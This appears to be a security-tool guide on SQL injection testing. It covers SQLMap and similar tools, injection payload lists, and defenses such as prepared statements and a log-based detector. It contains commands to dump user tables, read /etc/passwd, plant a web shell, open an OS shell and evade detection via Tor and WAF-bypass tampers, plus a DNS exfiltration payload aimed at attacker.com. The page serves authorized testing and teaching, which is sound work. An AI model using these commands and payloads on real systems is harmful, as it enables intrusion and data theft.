Legal Notice: Only test SQL injection vulnerabilities on applications you own or have explicit written authorization to test. Unauthorized exploitation is illegal and can result in severe penalties.

Overview

SQL Injection (SQLi) remains one of the most critical web application vulnerabilities. These tools help security professionals identify, test, and exploit SQL injection flaws in web applications, databases, and APIs. They automate detection, dumping databases, and demonstrating the impact of SQLi vulnerabilities.

Use Cases

  • Vulnerability Assessment: Identify SQL injection points
  • Penetration Testing: Exploit SQLi to demonstrate impact
  • Database Enumeration: Extract database structure and data
  • Security Research: Analyze SQLi attack vectors
  • Bug Bounty Hunting: Find and report SQLi vulnerabilities

Available Tools

SQLMap

The most powerful automated SQLi tool

NoSQLMap

NoSQL database injection and exploitation

DSSS

Damn Small SQLi Scanner - lightweight scanner

Explo

Web security issue description framework

Blisqy

Time-based blind SQL injection exploiter

Leviathan

Wide-range mass audit toolkit with SQLi

SQLScan

Quick web scanner for SQL injection points

SQLMap

Description

SQLMap is the industry-standard open source penetration testing tool that automates detecting and exploiting SQL injection flaws. It supports all major database management systems and provides powerful features for database fingerprinting, data extraction, and even operating system takeover.

Installation

# no sudo needed: cloning as root only leaves root-owned files behind
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev

Basic Usage

# Simple URL scan
python3 sqlmap.py -u "http://example.com/page.php?id=1"

# With POST data
python3 sqlmap.py -u "http://example.com/login.php" --data="username=admin&password=pass"

# Test specific parameter
python3 sqlmap.py -u "http://example.com/page.php?id=1&name=test" -p id

# Automated scan with wizard
python3 sqlmap.py --wizard

Advanced Features

# List databases
python3 sqlmap.py -u "URL" --dbs

# List tables in database
python3 sqlmap.py -u "URL" -D database_name --tables

# List columns in table
python3 sqlmap.py -u "URL" -D database_name -T table_name --columns

# Dump table data
python3 sqlmap.py -u "URL" -D database_name -T users --dump

# Dump all databases
python3 sqlmap.py -u "URL" --dump-all

# Test login form
python3 sqlmap.py -u "http://example.com/login" \
  --data="username=admin&password=pass" \
  --level=5 --risk=3

# With cookie authentication
python3 sqlmap.py -u "URL" \
  --cookie="PHPSESSID=abcd1234" \
  --level=2

# With custom headers
python3 sqlmap.py -u "URL" \
  --headers="Authorization: Bearer token123"

# Read file from server
python3 sqlmap.py -u "URL" --file-read="/etc/passwd"

# Write file to server
python3 sqlmap.py -u "URL" --file-write="shell.php" \
  --file-dest="/var/www/html/shell.php"

# Execute OS commands
python3 sqlmap.py -u "URL" --os-cmd="whoami"

# Get OS shell
python3 sqlmap.py -u "URL" --os-shell

# Get SQL shell
python3 sqlmap.py -u "URL" --sql-shell

Important Options

Option          Description              Example
-u              Target URL               -u "http://site.com?id=1"
--data          POST data                --data="user=admin&pass=x"
-p              Testable parameter       -p id
--cookie        HTTP Cookie value        --cookie="session=abc123"
--level         Test level (1-5)         --level=3
--risk          Risk level (1-3)         --risk=2
--dbs           Enumerate databases      --dbs
-D              Specify database         -D mydatabase
-T              Specify table            -T users
--dump          Dump table data          --dump
--batch         Never ask for input      --batch
--random-agent  Use random User-Agent    --random-agent
--tor           Use Tor network          --tor

Usage Examples

# GET request with automatic fingerprinting
python3 sqlmap.py -u "http://example.com/product?id=1" --batch --banner

# POST request login form
python3 sqlmap.py -u "http://example.com/login" \
  --data="username=admin&password=test" \
  --level=5 --risk=3 --batch

# Extract specific data
python3 sqlmap.py -u "http://example.com/user?id=1" \
  -D website_db -T users -C username,password,email --dump

# Use with Burp Suite request file
python3 sqlmap.py -r request.txt --batch

# Stealthy scan with randomization
python3 sqlmap.py -u "http://example.com/page?id=1" \
  --random-agent --delay=2 --tor --check-tor

Performance: Use --threads=10 for faster scanning, but be cautious, as high thread counts may crash the application or trigger security alerts.

NoSQLMap

Description

NoSQLMap is designed to audit and automate injection attacks against NoSQL databases like MongoDB, CouchDB, and Redis. As NoSQL databases gain popularity, testing for NoSQL injection becomes increasingly important.

Installation

git clone https://github.com/codingo/NoSQLMap.git
sudo chmod -R 755 NoSQLMap
cd NoSQLMap
python setup.py install

Running

python NoSQLMap

Features

  • MongoDB injection detection
  • CouchDB exploitation
  • Redis command injection
  • Automated data extraction
  • Authentication bypass

MongoDB Requirement: NoSQLMap requires MongoDB to be installed for full functionality.

DSSS - Damn Small SQLi Scanner

Description

DSSS is a lightweight, fully functional SQL injection vulnerability scanner supporting both GET and POST parameters. Perfect for quick scans and integration into automated workflows.

Installation

git clone https://github.com/stamparm/DSSS.git
cd DSSS

Usage

# Scan GET parameter
python3 dsss.py -u "http://example.com/page.php?id=1"

# Scan POST parameters
python3 dsss.py -u "http://example.com/login" --data="user=admin&pass=test"

# Scan with cookie
python3 dsss.py -u "http://example.com/page?id=1" --cookie="session=abc123"

# Help and options
python3 dsss.py -h

Features

  • Fast scanning (typically under 100 requests)
  • Minimal false positives
  • GET and POST support
  • Cookie-based testing
  • Lightweight and portable

Explo

Description

Explo is a tool to describe web security issues in both human and machine-readable format (YAML). It’s useful for documenting and sharing SQLi findings in a standardized way.

Installation

git clone https://github.com/dtag-dev-sec/explo.git
cd explo
sudo python setup.py install

Usage

# Run test case
explo testcase.yaml

# Verbose mode
explo --verbose testcase.yaml

# Run multiple tests
explo examples/*.yaml

Blisqy

Description

Blisqy specializes in finding and exploiting time-based blind SQL injection vulnerabilities in HTTP headers. This is particularly useful when traditional injection points are protected but headers are not.

Installation

git clone https://github.com/JohnTroony/Blisqy.git
cd Blisqy

Usage

# Test User-Agent header
python blisqy.py -u "http://example.com" -h "User-Agent"

# Test custom header
python blisqy.py -u "http://example.com" -h "X-Forwarded-For"

# With verbosity
python blisqy.py -u "http://example.com" -h "Referer" -v

Time-Based Blind SQLi

Time-based blind SQL injection exploits the ability to make the database sleep or delay its response. Example payloads:

# MySQL
1' AND SLEEP(5)--

# PostgreSQL
1'; SELECT pg_sleep(5)--

# Microsoft SQL Server
1'; WAITFOR DELAY '00:00:05'--

Detection:
  • Normal response: < 1 second
  • Vulnerable response: 5+ seconds

Blisqy automates this process for HTTP headers.

Leviathan

Description

Leviathan is a comprehensive mass audit toolkit with service discovery, brute-force capabilities, SQL injection detection, and running custom exploits. Requires API keys for full functionality.

Installation

git clone https://github.com/leviathan-framework/leviathan.git
cd leviathan
sudo pip install -r requirements.txt

Running

cd leviathan
python leviathan.py

Features

  • Mass vulnerability scanning
  • Service discovery
  • SQL injection testing
  • Brute-force capabilities
  • Custom exploit integration
  • API integration (Shodan, Censys)

SQLScan

Description

SQLScan is a quick web scanner specifically designed to find SQL injection points rapidly. Written in PHP, it’s fast and easy to use.

Installation

# Install dependencies
sudo apt install php php-bz2 php-curl php-mbstring curl

# Download and install
sudo curl https://raw.githubusercontent.com/Cvar1984/sqlscan/dev/build/main.phar \
  --output /usr/local/bin/sqlscan
sudo chmod +x /usr/local/bin/sqlscan

Running

sudo sqlscan

SQL Injection Types

Classic SQL Injection

# Authentication bypass
' OR '1'='1
admin'--
' OR 1=1--

# Union-based
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT username,password FROM users--

Blind SQL Injection

# Boolean-based
' AND 1=1--  (True condition)
' AND 1=2--  (False condition)

# Time-based
' AND SLEEP(5)--
'; WAITFOR DELAY '00:00:05'--

Second-Order SQL Injection

The payload is stored in the database by one request (often through a query that is itself safely parameterized) and only executes later, when another part of the application reads the stored value back and concatenates it into a new query in a different context.

Out-of-Band SQL Injection

# DNS exfiltration (MS SQL)
'; exec master.dbo.xp_dirtree '\\'+@@version+'.attacker.com\share'--
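As an added defender-side example (not code from any tool on this page), the following Python scans constructed access-log lines for the payload families listed in the Time-Based Blind SQLi section and in the SQL Injection Types above, and uses the logged request duration to tell a time-based probe that merely arrived apart from one the database actually executed. It assumes an Apache combined log with a trailing %D duration field; the IPs, timestamps and user agents are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access log (Apache combined format plus a trailing %D request
# duration in microseconds). Not real traffic; the payloads are the ones on this page.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2024:13:55:36 +0000] "GET /page.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 12000
203.0.113.5 - - [10/Oct/2024:13:55:41 +0000] "GET /page.php?id=1%27+AND+SLEEP%285%29-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 5010000
203.0.113.5 - - [10/Oct/2024:13:55:47 +0000] "GET /page.php?id=1%27%3B+WAITFOR+DELAY+%2700%3A00%3A05%27-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 980000
203.0.113.9 - - [10/Oct/2024:13:56:02 +0000] "GET /user?id=1%27+UNION+SELECT+username%2Cpassword+FROM+users-- HTTP/1.1" 200 7300 "-" "sqlmap/1.8" 15000
203.0.113.9 - - [10/Oct/2024:13:56:12 +0000] "GET /login?user=%27+OR+%271%27%3D%271 HTTP/1.1" 302 0 "-" "Mozilla/5.0" 9500
198.51.100.2 - - [10/Oct/2024:13:57:00 +0000] "GET /search?q=sleeping+bags HTTP/1.1" 200 4000 "-" "Mozilla/5.0" 20000
"""
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)" (\d+)$'
)
# Signatures in priority order, applied to the URL-decoded, lowercased request target.
SIGNATURES = [
    ("time-based", re.compile(r"\b(?:sleep|pg_sleep|benchmark)\s*\(|\bwaitfor\s+delay\b")),
    ("union-based", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("auth-bypass", re.compile(r"'\s*or\s+\S+\s*=\s*\S+")),
]
DELAY_THRESHOLD_S = 5.0  # per the page: normal response < 1 s, injected delay 5 s or more

def analyze(log_text: str) -> list:
    """Return one finding per logged request whose decoded target matches a signature."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format: skip rather than guess
        ip, target, agent, micros = m.group(1), m.group(3), m.group(5), m.group(6)
        decoded = unquote_plus(target).lower()  # inspect what the application parsed
        category = next((name for name, pat in SIGNATURES if pat.search(decoded)), None)
        if category is None:
            continue
        duration_s = int(micros) / 1_000_000
        findings.append({
            "ip": ip, "user_agent": agent, "category": category, "target": target,
            "duration_s": duration_s,
            # A time-based probe that really slowed the response means the injected delay ran.
            "delay_observed": category == "time-based" and duration_s >= DELAY_THRESHOLD_S,
        })
    return findings

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f'{f["ip"]:13} {f["category"]:12} {f["duration_s"]:5.2f}s '
              f'delay_observed={f["delay_observed"]} {f["target"]}')
```

The WAITFOR line is flagged as a probe but not as a delay: the request came back in under a second, which is what you would see when the backend is not SQL Server or the injection did not execute.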

Best Practices

Testing Methodology

  1. Identify Injection Points
    • URL parameters
    • POST data
    • Cookies
    • HTTP headers
    • File uploads
  2. Test for Vulnerability
    # Start with simple payloads
    '
    ''
    `
    "
    --
    #
    
  3. Determine Database Type
    # MySQL
    ' AND @@version--
    
    # PostgreSQL
    ' AND version()--
    
    # MS SQL
    ' AND @@version--
    
    # Oracle
    ' AND banner FROM v$version--
    
  4. Exploit Systematically
    • Enumerate databases
    • Extract table structure
    • Dump sensitive data
    • Assess further access

Avoiding Detection

# Use random User-Agent
sqlmap -u "URL" --random-agent

# Add delays between requests
sqlmap -u "URL" --delay=2

# Use Tor for anonymity
sqlmap -u "URL" --tor --check-tor

# Limit threads
sqlmap -u "URL" --threads=1

Documentation

Report Writing: Document all findings:
  • Injection point (parameter, header, etc.)
  • Payload used
  • Database type and version
  • Data extracted
  • Impact assessment
  • Remediation recommendations

Defense Mechanisms

After testing, recommend these protections:

Prepared Statements (Best Defense)

# Python with MySQL (mysql-connector-python)
import mysql.connector

# connection parameters are placeholders; username comes from the request and is untrusted
connection = mysql.connector.connect(user="app", password="<db-password>", database="app")
cursor = connection.cursor(prepared=True)
query = "SELECT * FROM users WHERE username = %s"
cursor.execute(query, (username,))

// PHP with PDO
$stmt = $pdo->prepare('SELECT * FROM users WHERE username = :username');
$stmt->execute(['username' => $username]);
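To show why the prepared statement defeats the authentication-bypass payloads from the Classic SQL Injection section, here is an added example (not from the page's tools or any library) that runs the same login check both ways against a constructed in-memory SQLite table; the schema and user rows are assumed, and passwords are stored in plaintext only to keep the demo short.

```python
import sqlite3

# Constructed in-memory stand-in for the `users` table referred to on this page.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret-admin"), ("alice", "wonderland")])
    return conn

def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The 'before': input is spliced into the SQL text, so a quote in the input
    ends the string literal and the rest of the input becomes query syntax."""
    query = ("SELECT COUNT(*) FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return conn.execute(query).fetchone()[0] > 0

def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The 'after': the SQL text is fixed and the driver binds the values separately,
    so a quote in the input stays a plain character inside a string value."""
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0

if __name__ == "__main__":
    db = make_db()
    # The second and third inputs are the bypass payloads listed on this page.
    for user, pw in [("admin", "s3cret-admin"), ("x", "' OR '1'='1"), ("admin'--", "wrong")]:
        print(f"{user!r:12} {pw!r:14} vulnerable={login_vulnerable(db, user, pw)} "
              f"parameterized={login_parameterized(db, user, pw)}")
```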

Input Validation

# Whitelist (allowlist) validation: accept only the characters the field legitimately needs
import re

def is_allowed(user_input):
    # re.fullmatch rather than re.match with ^...$: '$' would also match before a trailing newline
    return re.fullmatch(r'[a-zA-Z0-9_]+', user_input) is not None

if is_allowed(user_input):
    safe_value = user_input  # safe to use, still through a parameterized query
else:
    raise ValueError("rejected input")

Other Protections

  • Least Privilege: Database user should have minimal permissions
  • WAF: Web Application Firewall for additional layer
  • Escaping: Last resort, not recommended as primary defense
  • Error Handling: Don’t expose database errors to users
  • Monitoring: Log and alert on suspicious patterns

Troubleshooting

Solutions:
  • Increase level: --level=5
  • Increase risk: --risk=3
  • Test all parameters: -p "*"
  • Try different techniques: --technique=BEUSTQ
  • Check for WAF: --identify-waf
  • Bypass WAF: --tamper=space2comment
Verification:
  • Manually test the payload
  • Check response differences
  • Verify with alternative tools
  • Test with known-safe input
  • Examine actual database behavior
Optimization:
# Reduce threads
--threads=1

# Skip heavy checks
--no-cast --no-escape

# Limit techniques
--technique=B  # Boolean-based only

# Target specific DBMS
--dbms=MySQL

Additional Resources

Responsible Disclosure: If you find SQL injection vulnerabilities during authorized testing or bug bounty programs, report them responsibly. Never access, modify, or delete data beyond what’s necessary to demonstrate the vulnerability.
